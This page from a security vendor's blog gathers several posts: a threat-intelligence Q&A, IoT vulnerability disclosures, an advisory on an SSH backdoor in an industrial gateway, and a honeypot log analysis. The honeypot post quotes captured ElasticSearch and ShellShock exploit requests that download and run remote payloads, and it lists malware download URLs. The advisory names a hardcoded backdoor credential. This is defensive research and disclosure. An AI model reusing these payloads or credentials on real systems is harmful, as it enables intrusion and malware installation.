Skip navigation
All Places > Information Security > Blog
1 2 3 Previous Next

Information Security

620 posts

Thanks to everyone who joined our webinar on How to Build Threat Intelligence into your Incident Detection and Response Program. We got so many great questions during the session that we decided to follow up with a post answering them and addressing the trends and themes we continue to see around threat intelligence.

TL/DR for those of you who don't have time to read all of the responses (we got a lot of questions):

  • Threat intelligence is a process, not something you buy. That means you will have to put work in in order to get results.
  • Threat intelligence works best when it is integrated across your security operations and is not viewed as a stand-alone function
  • Strategic, Operational, and Tactical threat intelligence (including technical indicators) are used differently and gathered using different methods.

Do you see threat intelligence as a proactive approach to cyber monitoring or a just a better way of responding to cyber threats? If you see it as proactive, how, since the intelligence is based on events, TTPs,that have already occurred?

 

A misconception about threat intelligence is that it is focused exclusively on alerting or monitoring. We talked about indicators of compromise and how to use them for detection and response, but there is a lot more to threat intelligence than IOCs. 

 

When threat intelligence is properly implemented in a security program it contributes to prevention, detection, and response. Understanding the high level, strategic threats facing your organization helps determine how to improve overall security posture.

 

All intelligence must be based on facts,( i.e. things that have already occurred or that we already know), but those facts that allow us to create models that can be used to identify trends and assess what controls should be put in place to prevent attacks. 

 

As prevention comes into alignment, it is important to maintain awareness of new threats leveraging operational and tactical intelligence,taking actions to protect your organization before they are able to impact you.

 

I can see the usefulness of tactical, operational and technical intelligence. How would you be able to establish strategic intelligence?

 

Strategic Intelligence is intelligence that informs leadership or decisions makers on the overarching threats to the organization or business. Think of this as informing high level decision making based on evidence, seeing the forest without being distracted by the trees.

 

Information that contributes to strategic intelligence is gathered and analyzed over a longer period of time than other types of threat intelligence. The key to utilizing strategic intelligence is being able to apply it in the context of your own data and attack surface. An example would be intelligence that financially motivated cyber criminals are targeting third party vendors in order to gain access to retail networks. This information could be used to assess whether a business would be vulnerable to this type of attack and identify longer term changes that need to take place to reduce the risk, such as network segmentation, audits of existing third-party access, and development of policies to limit access.

 

What is the difference between Strategic and Operational Intelligence?

 

Strategic intelligence focuses on long term threats and their implications while operational intelligence focuses on short term threats that may need to be mitigated immediately. Implementing strategic and operational intelligence often involves asking the same questions: who and why. With strategic intelligence you are evaluating the attackers - focusing on their tactics and motivations rather than geographical location - to determine how those threats may impact you in the future. With operational intelligence you are evaluating who is actually being targeted and how so that you can determine if you need to take any immediate actions in response to the the threat.



What is positive control and why is it important?

Positive control is the aspirational state of a technical security program . This means that only authorized users and systems are on the network, and that accounts and information are accessed only by approved users. Before you start assessing your network to understand what “normal” looks like, take care and be sure that you are not including attacker activity in your baseline.

 

 

If you are being targeted by an identified entity, what should you do to build intelligence on possible attacks?

Active and overt attacks fall into the realm of operational intelligence. You can gather intelligence on these attacks from social media, blog posts, or alerts from places like US-CERT, ISACs, ISAOs other sharing groups. Some questions you should be asking and answering as you gather information are:

  • Who else is being targeted? Can we share information with them on this attack?
  • How have the attackers operated in the past?
  • What are we seeing now that can help us protect ourselves?

 

What is done in Tactical Monitoring?

Tactical Intelligence tends to focus on mechanisms- the “how” of what an attacker does. Do they tend to use a particular method to gain initial access? A particular tool or set of tools to escalate privilege and move laterally? What social engineering or reconnaissance activities do they typically engage in prior to an attack? Tactical intelligence is geared towards security personnel who are actively monitoring their environment as well as gathering reports from employees who report strange activities or social engineering attempts. Tactical Intelligence can also be used by hunters who are seeking to identify a behavior that may be a normal user behavior but is also a behavior that is used by an attacker to avoid detection. This type of intelligence requires more advanced resources, such as extensive logging, behavioral analytics, endpoint visibility, and trained analysts. It also requires a security-conscious workforce, as some indicators may not be captured or flagged by logs without first being reported by an employee.

 

Can you point me to resources where to gather information regarding strategic, tactical and operational intelligence?

Before you start gathering information it is important to have a solid understanding of the different levels of threat intelligence. CPNI released a whitepaper covering four types of threat intelligence that we discussed on the webinar: https://www.cpni.gov.uk/Documents/Publications/2015/23-March-2015-MWR_Threat_Int elligence_whitepaper-2015.pdf

 

- Or - if you are an intelligence purist and find that four types of threat intelligence is one type too many (or if you’re just feeling rambunctious) you can refer to JP 2-0, Joint Intelligence, for in-depth understanding of the levels of intelligence and their traditional application. http://www.dtic.mil/doctrine/new_pubs/jp2_0.pdf

 

Once you are ready, here are some places to look for specific types of intelligence:

 

Strategic Intelligence can be gathered through open source trend reports such as the DBIR, DBIR industry snapshots, or other industry specific reports that are frequently released.

 

Operational Intelligence is often time sensitive and can be gather by monitoring social media, government alert like US-CERT, or by coordinating with partners in your industry.

 

Tactical Intelligence can be gathered using commercial or open sources, such as blogs, threat feeds, or analytic white papers. Tactical Intelligence should tell you how an actor operates, the tools and techniques that they use, and give you an idea of what activities you can monitor for on your own network. At this level understanding your users and how the normally behave is critical, because threat actors will try to mimic those same behaviors and being able to identify a deviation, no matter how small, can be extremely significant. 

 

What is open source threat intelligence?

Open Source intelligence (OSINT) is the product of gathering and analyzing data gathered from publicly available sources: the open internet, social media, media, etc.

More here: https://en.wikipedia.org/wiki/Open-source_intelligence

For more information on the other types of intelligence collection disciplines: https://www.fbi.gov/about-us/intelligence/disciplines

 

Open source threat intelligence is OSINT that focuses specifically on threats. In many cases you will be able to gather OSINT but will still have to do the analysis of the potential impact of the threat on your organization.

 

What are ISACs and ISAOs? Where can I find a list of them?

Most private sector information sharing is conducted through Information Sharing and Analysis Centers organized primarily by sectors (usually critical infrastructure, a list is located here: http://www.isaccouncil.org/memberisacs.html.

 

In the United States, under President Obama’s executive Order 13691, DHS was directed to improve information sharing between the US government’s National Cybersecurity and Communications Integration Center (NCCIC) and private sectors. This executive order serves as the platform to include those outside the traditional critical infrastructure sectors, Information Sharing and Analysis Organizations.

 

What specific tools are used for threat intelligence?

This is a great question, and I think underscores a big misunderstanding out there. Threat Intelligence is a process, not a product bought or service retained. Any tool you use should help augment your processes. There are a few broad classifications of tools out there, including threat intelligence platforms and data analytics tools. The best way to find the right tools is to identify what problem you are trying to solve with threat intelligence, develop a manual process that works for you, and then look for tools that will help make that manual process easier or more efficient.

 

Can a solution or framework be tailored to support organizations at different levels of cyber security maturity and awareness, or is there a minimum requirement?

There *is* a certain level of awareness that is required to implement a threat intelligence program. Notice that we didn’t say maturity - we feel that any level program can benefit from threat intelligence, but there is a lot that goes into a organization being ready to utilize it.

 

At the very basic level an organization needs to understand what threat intelligence is, what is isn’t, understand the problems that they are trying to solve with threat intel, and have a person or a team who is responsible for threat intel. An organization with this base level understanding is far ahead of many others.

 

When discussing the more technical implementations of threat intelligence such as threat feeds or platforms then there are some barriers to entry. Aside from those situations, nearly any organization can work to better understand the threats facing them and how they should start to posture themselves to prevent or respond to those threats. Regardless of where you are, if you understand how threat intelligence works and start to implement it appropriately then you will be better off regardless of what else you are dealing with.

 

How do you stop an attacker once discovered? ACL IPS etc?

Scoping the attack is the first stage, which requires both investigation and forensics. The investigation team will identify various attributes used in the attack (tools, tactics, procedures), and then will go back and explore the rest of your systems for those attributes.

 

As systems get added, the recursive scoping loop continues until no new systems are added.

 

Once scoping is done, there are a number of actions to be taken- and the complexity involved in deciding exactly what happens (and when) grows exponentially. A short (and anything but comprehensive) list of considerations include:

  • Executive briefing and action plan signoff
  • Estimate business impact by the recovery actions to be executed
  • Isolate compromised systems
  • Lock or change passwords on all compromised accounts with key material in the scoped systems
  • Patch and harden all systems in the organization against vulnerability classes used by the attacker
  • Identify exactly what data was impacted, consult with legal regarding regulatory or contractual required next steps
  • Safely and securely restore impacted services to the business

 

Obviously there are a lot of variables at play here, and every incident is unique.

This stuff is extremely hard, if it was easy- everyone would be doing it.

Call us if you need help.

 

When I find a system that has been compromised, can you tell me where it came from?

You’re asking the right question here- getting a sense of the attacker’s motivation and tactics is extremely valuable. Answering “who did this” and “where did they come from” is a lot more difficult than simply pointing at the source IP for initial point of entry or command and control.

 

Tactical Intelligence from the investigation will help answer these questions.

 

What should be the first step after knowing that the host has been compromised by zero day attack?

Run around, scream and shout.

In all seriousness, you won’t start off with the knowledge of zero-day being used to compromise an asset. Discovering that 0day was used in a compromise, by definition, means that an investigation was performed when the root-cause identified at the point of infection was, in fact, 0day. At that point you will hopefully have gathered more information about the incident that you can then analyze to better understand the situation you are facing.

Harley Geiger

I've joined Rapid7!

Posted by Harley Geiger Employee Feb 10, 2016

Hello! My name is Harley Geiger and I joined Rapid7 as director of public policy, based out of our Washington, DC-area office. I actually joined a little more than a month ago, but there's been a lot going on! I'm excited to be a part of a team dedicated to making our interconnected world a safer place.

 

Rapid7 has demonstrated a commitment to helping promote legal protections for the security research community. I am a lawyer, not a technologist, and part of the value I hope to add is as a representative of security researchers' interests before government and lawmaking bodies – to help craft policies that recognize the vital role researchers play in strengthening digital products and services, and to help prevent reflexive anti-hacking regulations. I will also work to educate the public and other security researchers about the impact laws and legislation may have on cybersecurity.

 

Security researchers are on the front lines of dangerous ambiguities in the law. Discovering and patching security vulnerabilities is a highly valuable service – vulnerabilities can put property, safety, and dignity at risk. Yet finding software vulnerabilities often means using the software in ways the original coders do not expect or authorize, which can create legal issues. Unfortunately, many computer crime laws - like the Computer Fraud and Abuse Act (CFAA) - were enacted decades ago and make little distinction between beneficial security research and malicious hacking. And, due to the steady stream of breaches, there is constant pressure on policymakers to expand these laws even further.

 

I believe the issues currently facing security researchers also have broader societal implications that will grow in importance. Modern life is teeming with computers, but the future will be even more digitized. The laws governing our interactions with computers and software will increasingly control our interactions with everyday objects – including those we supposedly own – potentially chilling cybersecurity research, repair, and innovation when these activities should be broadly encouraged. We, collectively, will need greater freedom to oversee, modify, and secure the code around us than the law presently affords.

 

That is a major reason why the opportunity to lead Rapid7's public policy activities held a lot of appeal for me. I strongly support Rapid7's mission of making digital products and services safer for all users. In addition, it helped that I got to know Rapid7's leadership team years before joining. I first met Corey Thomas, Lee Weiner, and Jen Ellis while working on "Aaron's Law" for Rep. Zoe Lofgren in the US House of Representatives. After working for Rep. Lofgren, I was Senior Counsel and Advocacy Director at the Center for Democracy & Technology (CDT), where I again collaborated with Rapid7 on cybersecurity legislation. I've been consistently impressed by the team's overall effectiveness and dedication.

 

Now that I'm part of the team, I look forward to working with all of you to modernize how the law approaches security research and cybersecurity. Please let me know if you have ideas for collaboration or opportunities to spread our message. Thank you!

 

Harley Geiger

Director of Public Policy

Rapid7

@HarleyGeiger

I’ve never been one for New Year’s resolutions. I’ve seen how they tend to exist only for short-term motivation rather than long-term achievement. Resolutions are just not specific enough and there’s no tangible means for accomplishing anything of real value. Just check out your local gym by mid-February. It’s all cleared out. The people who energetically vowed to make changes late last year have simply lost their resolve.

 

But it’s not just a personal thing. The cycle of resolve-try-forget exists in our professional lives as well. If you manage an information security program or somehow have your hands in the IT risk equation, you have to be careful not to get on that diet-like roller coaster. You need a plan. You need specific steps to take. You have to hold yourself accountable. The very moment you say something high-level that you want to accomplish with your information security program – with no specific details or deadlines – is the very moment you hop on the road of good intentions. We all know where that leads.

 

For example, let’s say you resolve to do the following for your security program this year:

  • Do more security assessments
  • Follow-up on security assessment results sooner
  • Perform additional security monitoring
  • Send more security awareness emails to users
  • Not get hacked
  • Talk to management about what’s happening on the network

 

You write these down on a whiteboard in your conference room so everyone can see them. With your staff being exposed to these resolutions during your team weekly meetings, they’ll keep them on the top of their minds and things will take care of themselves, right? Absolutely not! Just ask the guy who vowed to eat less and exercise more. He’s not at the gym so you’ve got a better chance of tracking him down.

 

Take a look at each of the above resolutions. Notice anything missing? They’re not specific. There are no documented steps that need to be taken to accomplish them. There are no deadlines. They’re mere wishes. Dreams at best. If you want to start accomplishing things in information security, you have to get serious and document actual goals. You then have to “manage” your goals which means that you revisit them on a periodic and consistent basis, i.e. daily, and take steps every week to make each goal become reality. Goals are not all that different from security metrics that you might have. They’re specific and tangible. They’re also reasonable and attainable.

 

I’m convinced that if we were to look at the root causes of all the publicly-known breaches, we’d certainly see politics, ignorance, and downright bad luck at the root of all of them. But odds are excellent that we’d also see that the people in charge had no goals for managing information security or they were, at least, mismanaging them.

 

Take a look at your security program and determine what you want to accomplish this year. It’ll be obvious but it won’t be easy. It’s up to you to make things happen. It takes more than resolve. It takes the proper philosophy and, most importantly, discipline.

Through our recent publication of numerous security issues of Internet-connected baby monitors, we were able to comprehensively raise awareness of the real-world risks facing those devices. Further, we were able to work with a number of vendors to get key security problems resolved, resulting in major increases of security within that particular market space. Today, Rapid7 is continuing this effort in applying security research to the Internet of Things (IoT) with the release of information on two new security research projects that have also improved the safety and privacy of families.

 

With this most recent research, we have once again been able to work with vendors to resolve serious security issues impacting their platforms and hope that vendors considering related products are able to take note of these findings so that the overall market can improve beyond just these particular instances. We also hope that consumers are able to use these issues as examples of the potential risks of leveraging IoT products within their own family. As usual, relevant vendors were notified and CERT proved instrumental in connecting us with the vendors in question, per our usual disclosure policy.

 

Fisher-Price Smart Toy®

Smart-Toy.jpg

The Fisher-Price Smart Toy® is an innovative line of digital "stuffed animals" that provide both educational and entertainment options for children ranging in ages from 3-8 years old. While the device is able to function without Internet-connected capabilities, its functionality is enhanced over Wi-Fi through a companion mobile application for parents and updates to device activities. Plus, let's face it, a "smart" toy doesn't really get very smart without some real-time Internet connectivity!

 

The issues for the Fisher-Price Smart Toy® were disclosed to CERT under vulnerability note VU#745448.

 

Vulnerability R7-2015-27: Improper Authentication Handling (CVE-2015-8269)

Through analysis of the Fisher-Price Smart Toy® at hardware, software, and network levels, it was determined that many of the platform's web service (API) calls were not appropriately verifying the "sender" of messages, allowing for a would-be attacker to send requests that shouldn't be authorized under ideal operating conditions. The following is a list of APIs that were found at risk to this lack of proper authorization and associated impacts due to that vulnerability.

 

  • Find all customers (sequential integer), which provides a list of those customers' toy details (toy ID, toy name, toy type, and associated child profile)
  • Find all children's profiles, which provides their name, birthdate, gender, language, and which toys they have played with
  • Create, edit, or delete children's profiles on any customer's account, which will be displayed within a parent's mobile application
  • Alter what toys a customer's account has (e.g. delete toys, add someone else's toy to a different account), effectively allowing an attacker to 'hijack' the device's built-in functionality
  • Find the status of whether a parent is actively using their associated mobile application or if a child is interacting with their toy
  • Read access to miscellaneous data, such as what game packs are attached to a profile, what purchases were made by a customer, and scores for games

 

Impact

Most clearly, the ability for an unauthorized person to gain even basic details about a child (e.g. their name, date of birth, gender, spoken language) is something most parents would be concerned about. While in the particular, names and birthdays are nominally non-secret pieces of data, these could be combined later with a more complete profile of the child in order to facilitate any number of social engineering or other malicious campaigns against either the child or the child's caregivers.

 

Additionally, because a remote user could hijack the device's functionality and manipulate account data, they could effectively force the toy to perform actions that the child user didn't intend, interfering with normal operation of the device.

 

Disclosure Timeline for R7-2015-27

Fri, Nov 13, 2015: Initial research and discovery by Mark Stanislav of Rapid7, Inc.

Mon, Nov 23, 2015: Initial contact to the vendor.

Tue, Dec 08, 2016: Details disclosed to CERT as VU#745448.

Thu, Jan 07, 2016: Disclosure details acknowledged by the vendor.

Tue, Jan 19, 2016: Issues addressed as reported by the vendor.

Tue, Feb 02, 2016: Public disclosure of R7-2015-27.

 

HereO-family-watch2.jpg

hereO GPS Platform

The hereO GPS Platform provides family members a connected and integrated means to easily keep track of the location and activity of each other through the use of both a multi-platform mobile application and a cellular-enabled watch that is targeted at use by children ranging in ages from 3-12 years old. Much like a traditional social network, family members can be invited into a group and then have varying levels of access to each other, determined by administrative users. Additional features of this platform include intra-family communication (i.e. messaging), notifications for people coming and/or going from a specific location (i.e. geo fences), and even a panic-alert function.

 

The issues for the hereO GPS Platform were disclosed to CERT under vulnerability note VU#213384.

 

Vulnerability R7-2015-24: Authorization Bypass

Through analysis of the hereO GPS Platform at software and network levels, it was determined that an authorization flaw existed within the platform's web service (API) calls related to account invitations to a family's group were not adequately protected against manipulation. Through the use of a pawn account that an attacker controls, they are able to send a request for authorization into a family's group they are targeting, but by abusing an API vulnerability, allow their pawn account to accept that request on that targeted family's behalf. The following diagram shows the effective attacker's workflow used to conduct this attack.

 

attack-flow-chart.png

Impact

By abusing this vulnerability, an attacker could add their account to any family's group, with minimal notification that anything has gone wrong. These notifications were also found to be able to get manipulated through clever social-engineering by creating the attacker's "real name" with messages such as, 'This is only a test, please ignore.'

 

Once this exploit has been carried out, the attacker would have access to every family member's location, location history, and be allowed to abuse other platform features as desired. Because the security issue applies to controlling who is allowed to be a family member, the rest of this functionality performs as intended and not itself any form of vulnerability.

 

Disclosure Timeline for R7-2015-24

Sat, Oct 24, 2015: Issue discovered by Mark Stanislav of Rapid7, Inc.

Thu, Oct 29, 2015: Internal review by Rapid7, Inc.

Mon, Nov 02, 2015: Initial vendor contact.

Tue, Nov 23, 2015: Details disclosed to CERT, VU#213384 assigned.

Tue, Dec 15, 2015: Details disclosed to the vendor.

Tue, Dec 15, 2015: Issue resolved as reported by the vendor.

Tue, Feb 02, 2016: Public disclosure of R7-2015-24.

 

Conclusions

This research helps to further underline the nascency of the Internet of Things with regard to information security. While many clever & useful ideas are constantly being innovated for market segments that may have never even existed before, this agility into consumers's hands must be delicately weighed against the potential risks of the technology's use.

 

Still, it's important to be mindful that all technologies contain bugs that can often impact the security of the ecosystem powering a sometimes complex mixture of protocols, standards, and components. While the issues explained here were detrimental to their user's privacy and safety, they were also issues that we've seen so many organization's make.

 

For this reason, it's critical that vendors creating the next generation of IoT products & platforms leverage industry initiatives, such as BuildItSecure.ly and OTA's IoT Trust Framework, to better the security of these technologies before they enter consumer's hands and homes.

 

If you're curious about some of the techniques to approach research such as this, please take a look at a previously published primer on IoT hacking that discusses some of the approaches and technologies used to conduct this research.

While looking into the SSH key issue outlined in the ICS-CERT ISCA-15-309-01 advisory, it became clear that the Dropbear SSH daemon did not enforce authentication, and a possible backdoor account was discovered in the product.  All results are from analyzing and running firmware version 1322_D1.98, which was released in response to the ICS-CERT advisory.

This issue was discovered and disclosed as part of research resulting in Rapid7's disclosure of R7-2015-25, involving a number of known vulnerabilities present in the Advantech firmware. Given that CVE-2015-7938 represents a new vulnerability, however, it was held back until January, 2016.

 

Product Description

The Advantech EKI series products are Modbus gateways used to connect serial devices to TCP/IP networks. They are typically found in industrial control environments. The firmware analyzed is specific to the EKI-1322 GPRS (General Packet Radio Service) IP gateway device, but given the scope of ICSA-15-309-01, it is presumed these issues are present on other EKI products.

 

Credit

This issue was discovered by HD Moore of Rapid7, Inc.

 

Details

As of the 1.98 version of the firmware, The Dropbear daemon included had been heavily modified. As a result, it does not actually enforce authentication. During testing, any user is able to able to bypass authentication by using any public key and password.

 

In addition, there may be a backdoor hardcoded into this version of the binary as well, using the username and password of "remote_debug_please:remote_debug_please", as shown in the partial firmware analysis below:

 

.text:000294F8                 ADD     R0, R0, #0x2C   ; haystack
.text:000294FC                 LDR     R1, =aRemote_debug_p ; "remote_debug_please"
.text:00029500                 LDR     R3, =strstr

 

Note that it is unconfirmed if this backdoor account is reachable on a production device by an otherwise unauthenticated attacker; its presence was merely noted during binary analysis, and the vendor has not acknowledged the purpose or existence of this account.

 

Mitigations

The authentication bypass issue is resolved in EKI-1322_D2.00_FW, available from the vendor's website as of December 30, 2015. Customers are urged to install this firmware at their earliest opportunity.

In the event that firmware cannot be installed, users of these devices should ensure that sufficient network segmentation is in place, and only trusted users and devices are able to communicate to the EKI-123* device.

 

Disclosure Timeline

This issue was disclosed via Rapid7's usual disclosure policy.

 

  • Wed, Nov 11, 2015: Initial contact to vendor
  • Tue, Dec 01, 2015: R7-2015-25.4 disclosed to CERT
  • Tue, Dec 01, 2015: VU#352776 assigned by CERT
  • Wed, Dec 09, 2015: Receipt of VU#352776 confirmed by ICS-CERT
  • Wed, Dec 30, 2015: EKI-1322_D2.00_FW released by the vendor
  • Tue, Jan 05, 2016: Bulletin ICSA-15-344-01 updated by ICS-CERT
  • Fri, Jan 15, 2016: R7-2015-26 publicly disclosed by Rapid7

In order to learn more about the strategic initiatives, current tools used, and challenges security teams are facing today, we surveyed 271 security professionals hailing from organizations across the globe. We were able to get fantastic responses representing companies from all sizes and industries, including healthcare, finance, retail, and government.

 

IDR-Survey-Report.png

 

On January 21st, we will be hosting a webcast with full analysis of the results. Register now and get the full report today. As a teaser, here are two key findings:

 

     1. 90% of organizations are worried about compromised credentials, though 60% say they cannot catch these types of attacks today.

Detecting-Compromised-Credentials.png

 

     2. 62% of organizations are receiving more alerts than they can feasibly investigate.

 

SIEM-Alert-Quantity.png

 

For more, including:

  • Major sources of pain in their Incident Response Program
  • SIEMs: Who has one, and how are they using it?
  • Cloud: Most popular services, organizational policy, and security visibility

 

Download the full report here. To learn more about Rapid7’s Incident Detection and Response offerings, visit our solutions page, or join us for a free Guided Demo!

One of the greatest challenges in security is getting the right information so that educated decisions can be made. It happens across many facets of security such as network monitoring, incident response, and user training. However, there’s one (big) exception: security assessments. Assuming you’re using the proper tools and reasonable methodologies to uncover your network security weaknesses, you have everything you need at your disposal. You have the vulnerabilities, the attack vectors, the systems affected, and even what’s required to resolve the issues.

 

Yet, still, time after time we hear of vulnerabilities that go unresolved. It’s discouraging to me, as a consultant, to see this. You know, the vulnerabilities that were in last quarter’s – or last year’s – assessment that are showing up today. I see this issue all the time. Unless management is willing to defend why known vulnerabilities remain unresolved, you have to have a plan of action after each assessment. Second only to actually mitigating the flaws, developing a specific plan should be a top priority.

 

Everyone’s approach and needs are unique, but there are certain aspects to getting things done that apply across the board including:

 

  • What has been uncovered?
  • How does each finding affect the business?
  • Where do we truly need to focus our efforts? (tip: it should be on the most urgent flaws on your most important systems)
  • Are there certain findings that we can take off the table completely?
  • Who can resolve each issue in the short term?
  • Who – or what – else needs to be involved to help prevent this issue from reoccurring?

 

Once you have this information, ask yourself: What’s next? What’s after that? And, what do we need to do now? Keep repeating this over and over until you get done what needs to be done.

 

Well-respected business executive, Jack Welch of GE, once said An organization's ability to learn, and translate that learning into action rapidly, is the ultimate competitive business advantage. You can’t un-acknowledge security vulnerabilities. They’re there. They’ve called attention to themselves. You know what needs to be done.

 

Don’t try to solve the security issues you uncover at a mere technical level, on your own. Go up a few steps and look at security management, business operations, and related issues that are the root causes. Then vow to do what it takes to make changes. Many people will try to wish such security issues away. Others will find every excuse in the book as to why it’s not possible to fix them. Don’t take those paths. We’ve seen where they end up. Let discipline and common sense lead the way instead.

This post is the 12th in the series, "12 Days of HaXmas."

 

So the Christmas season is here, and between ordering gifts and drinking Glühwein what better way to spend your time than sieve through some honeypot / firewall / IDS logs and try to make sense of it, right?

 

At Rapid7 Labs, we're not only scanning the internet, but also looking at who out there is scanning by making use of honeypot and darknet tools. More precisely we're running a couple of honeypots spread around the world and collecting raw traffic PCAP files with something similar to tcpdump (just slightly more clever).

 

This post is just a quick log of me playing around with some of the honeypot logs. Most of what I'm doing here is happening in one of our backend systems as well, but I figured it might be cool to explain this by doing it manually.

 

Some background

The honeypot is fairly simple, it waits for incoming connections and then tries to figure out what to do with it. It might need to treat it as a SSL/TLS connection, or just a plain HTTP request. Depending on the incoming protocol, it will try to answer in a meaningful way. Even with some very basic honeypot that just opens a port and waits for requests, you will quickly find things like this:

 

GET /_search?source={"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+"import+java.util.*;import+java.io.*;String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/zldyls+http://61.176.223.109:1111/zldyls\").getInputStream()));StringBuilder+sb+=+new+StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1} HTTP/1.1
Host: redacted:9200
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.4.1 CPython/2.7.8 Windows/2003Server

or this:

GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
Host: redacted
Connection: Close

What we're looking at are ElasticSearch (slightly modified as the path was URL decoded for better readability) and ShellShock exploit attempts. One can quickly see that the technique is fairly straightforward - there's a specific exploit that allows you to run commands. In these cases, the attackers are just running some straightforward shell commands in order to download a file (by any means necessary) and execute it. You can find several writeups around these exploitation attempts and the botnets behind it one the web (e.g. [1], [2], [3]).

 

Now because of this common pattern, our honeypot does some basic pattern matching and extracts any URL or command that it finds in the request. If there's a URL (inside a wget/curl/etc command), it will then try to download that file. We could also do this at post-processing stage, but by then the URL might not be available any more as these things tend to disappear or get taken down quickly.

 

Looking at the unique files from the last half year (roughly) we can count following file-types (reduced/combined for readability):

    178  ELF 32-bit LSB executable Intel 80386
     66  a /usr/bin/perl script ASCII text executable
     33  Bourne-Again shell script ASCII text executable
     14  POSIX tar archive (GNU)
     14  ELF 64-bit LSB executable x86-64
      4  ELF 32-bit LSB executable MIPS
      2  ELF 32-bit LSB executable ARM
      1  ELF 32-bit MSB executable PowerPC or cisco 4500
      1  ELF 32-bit MSB executable MIPS
      1  OpenSSH DSA public key

 

Typically the attacker is uploading a compiled malware binary. In some cases it's a shell script that will in turn download the next stage. And as we can see there's at least one case of an SSH public key that was uploaded - simple but effective. Also noteworthy is the targetting of quite a few different architectures. These are mostly binaries for embedded routers and for example the QNAP devices that are vulnerable to ShellShock.

 

Getting started on the logs

What kind of logs are we looking at? Mostly, our honeypot emits events like "there was a connection" or "i found a URL in a request" and "i downloaded a file from a URL". The first step is to grab a bunch of these events (a few thousand) and apply some geolocation to them (see DAP) (again, modified for better readability):

 

$ cat logs | dap json + geoip sensor + geoip source + remove some + rename some + json
{
  "ref": "conn-d7a38178-0520-49db-a79a-688f5ded5998",
  "utcts": "2015-12-13T07:36:59.444356Z",
  "sha1": "3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9",
  "url": "http://ys-k.ys168.com/2.0/475535157/jRSKjUt4H535F3XKNTV/pycn.zuc",
  "url.netloc": "ys-k.ys168.com",
  "source": "117.175.110.177",
  "source.country_code": "CN",
  "sensor": "redacted",
  "sensor.country_code": "JP",
  "dport": 9200,
  "http.agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  "http.method": "POST",
  "vulns": "VULN-ELASTICSEARCH-RCE,CVE-2014-3120,EXEC-SHELLCMD",
}
...

 

Now we can take these logs and do some correlatation, creating one record per "attack". We also add a couple more data sources (ASN lookup, filetypes for the downloaded files, etc).

 

For the sake of this post, let's focus on the attacks which lead to downloadable files and that we could categorize as shellshock / elasticsearch exploits.

By writing a quick formatting script that does some counting of fields we get something pretty like this (using python prettytable) (full version):

 

+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| key             | count | seen              | sensorcountry | dport      | httpmethod | vulns                       | sha1                                          | url                                                                            |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 221.224.57.66   |   89  | first: 2015-08-05 |  54x US       |  89x 9200  |  89x GET   |  89x VULN-ELASTICSEARCH-RCE |  88x 53c458790384b9c33acafaa0c6ddf9bcbf35997e |  84x http://183.56.173.131:999/xiaojiba                                        |
| CN              |       | last:  2015-08-08 |  14x JP       |            |            |      CVE-2014-3120          |   1x b6bb2b7cad3790887912b6a8d2203bebedb84427 |   4x http://221.224.57.66:999/xiaojiba                                         |
| AS 4134         |       |                   |  10x AU       |            |            |      EXEC-SHELLCMD          |                                               |   1x http://221.224.57.66:999/qqqq                                             |
|                 |       |                   |   5x IE       |            |            |                             |                                               |                                                                                |
|                 |       |                   |   3x SG       |            |            |                             |                                               |                                                                                |
|                 |       |                   |   3x BR       |            |            |                             |                                               |                                                                                |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 61.147.103.74   |   87  | first: 2015-05-06 |  55x US       |  87x 9200  |  87x GET   |  87x VULN-ELASTICSEARCH-RCE |  87x f7b229a46b817776d9d2c1052a4ece2cb8970382 |  72x http://61.147.103.74/Aqks                                                 |
| CN              |       | last:  2015-05-27 |  15x SG       |            |            |      CVE-2014-3120          |                                               |  15x http://61.147.103.74/Aqmds                                                |
| AS23650         |       |                   |  11x AU       |            |            |      EXEC-SHELLCMD          |                                               |                                                                                |
|                 |       |                   |   4x JP       |            |            |                             |                                               |                                                                                |
|                 |       |                   |   2x IE       |            |            |                             |                                               |                                                                                |
+-----------------+-------+-------------------+---------------+------------+------------+-----------------------------+-----------------------------------------------+--------------------------------------------------------------------------------+
| 117.175.111.10  |   63  | first: 2015-10-26 |  21x IE       |  63x 9200  |  63x POST  |  63x VULN-ELASTICSEARCH-RCE |  48x 3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9 |  18x http://ys-f.ys168.com/2.0/475535129/gUuMfKl6I345M2KKMN3L/hgfd.pzm         |
| CN              |       | last:  2015-10-27 |  11x US       |            |            |      CVE-2014-3120          |  15x 139033fef5a1dacbd5764e47f1403ebdf6bd854e |  15x http://ys-m.ys168.com/2.0/475535116/j5I614N5344N6HhSvKVs/pua.kfc          |
| AS 9808         |       |                   |   9x JP       |            |            |      EXEC-SHELLCMD          |                                               |  15x http://ys-j.ys168.com/2.0/475535140/l5I614M7456NM1hVsIxw/ggg.vip          |
|                 |       |                   |   8x AU       |            |            |                             |                                               |   9x http://ys-d.ys168.com/2.0/475535151/jRtNjKj7K426K6IH6PLK/wsy.sto          |
|                 |       |                   |   8x SG       |            |            |                             |                                               |   5x http://183.60.202.97:12100/mmml                                           |
|                 |       |                   |   6x BR       |            |            |                             |                                               |   1x http://ys-f.ys168.com/2.0/475535137/iTwHtWk4H537H4685MMK/mmml.bbt         |
